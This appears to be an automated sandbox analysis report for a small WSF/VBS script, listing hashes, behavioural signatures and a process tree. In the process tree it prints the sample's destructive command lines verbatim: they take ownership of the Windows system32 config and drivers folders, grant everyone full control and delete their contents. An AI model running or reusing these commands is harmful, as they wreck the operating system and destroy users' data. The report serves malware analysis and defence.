Analysis
- max time kernel: 144s
- max time network: 135s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 15-08-2024 21:32
Static task: static1
Behavioral task: behavioral1
- Sample: file.wsf
- Resource: win7-20240704-en
General
- Target: file.wsf
- Size: 2KB
- MD5: a5248e8a553244ebf5fe783d59068860
- SHA1: f866fc5f1d41e8cf209b3ea253f49a9caebb0012
- SHA256: e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
- SHA512: 7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes (pid | process):
  4600 | takeown.exe
  4328 | takeown.exe
  4404 | icacls.exe
  3980 | icacls.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description | ioc | process):
  Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | cmd.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | WScript.exe
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes (pid | process):
  4600 | takeown.exe
  4328 | takeown.exe
  4404 | icacls.exe
  3980 | icacls.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoC)
  Processes (description | ioc | process):
  Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | cmd.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description | pid | process):
  Token: SeTakeOwnershipPrivilege | 4328 | takeown.exe
- Suspicious use of WriteProcessMemory (14 IoCs)
  Processes (description | pid | process | target process):
  PID 3940 wrote to memory of 3780 | 3940 | cmd.exe | WScript.exe
  PID 3940 wrote to memory of 3780 | 3940 | cmd.exe | WScript.exe
  PID 3780 wrote to memory of 4220 | 3780 | WScript.exe | cmd.exe
  PID 3780 wrote to memory of 4220 | 3780 | WScript.exe | cmd.exe
  PID 3780 wrote to memory of 3288 | 3780 | WScript.exe | cmd.exe
  PID 3780 wrote to memory of 3288 | 3780 | WScript.exe | cmd.exe
  PID 4220 wrote to memory of 4600 | 4220 | cmd.exe | takeown.exe
  PID 4220 wrote to memory of 4600 | 4220 | cmd.exe | takeown.exe
  PID 3288 wrote to memory of 4328 | 3288 | cmd.exe | takeown.exe
  PID 3288 wrote to memory of 4328 | 3288 | cmd.exe | takeown.exe
  PID 4220 wrote to memory of 4404 | 4220 | cmd.exe | icacls.exe
  PID 4220 wrote to memory of 4404 | 4220 | cmd.exe | icacls.exe
  PID 3288 wrote to memory of 3980 | 3288 | cmd.exe | icacls.exe
  PID 3288 wrote to memory of 3980 | 3288 | cmd.exe | icacls.exe
Processes
- C:\Windows\system32\cmd.exe (depth 1, PID 3940)
  Command line: cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WScript.exe (depth 2, PID 3780)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe (depth 3, PID 4220)
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\takeown.exe (depth 4, PID 4600)
        Command line: takeown /f c:\windows\system32\config\*
        - Possible privilege escalation attempt
        - Modifies file permissions
      - C:\Windows\system32\icacls.exe (depth 4, PID 4404)
        Command line: icacls c:\windows\system32\config\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions
    - C:\Windows\System32\cmd.exe (depth 3, PID 3288)
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\takeown.exe (depth 4, PID 4328)
        Command line: takeown /f c:\windows\system32\drivers\*
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\icacls.exe (depth 4, PID 3980)
        Command line: icacls c:\windows\system32\drivers\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 1, PID 3704)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4088,i,11708048364682646792,608099842549576907,262144 --variations-seed-version --mojo-platform-channel-handle=1020 /prefetch:8
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: a5248e8a553244ebf5fe783d59068860
  SHA1: f866fc5f1d41e8cf209b3ea253f49a9caebb0012
  SHA256: e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
  SHA512: 7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8
- Filesize: 78B
  MD5: ece02545122cc48c9d8afaf3f94dd04f
  SHA1: 8e07b6da685faad07f8413230a95ce0ae8987e0d
  SHA256: 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
  SHA512: e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5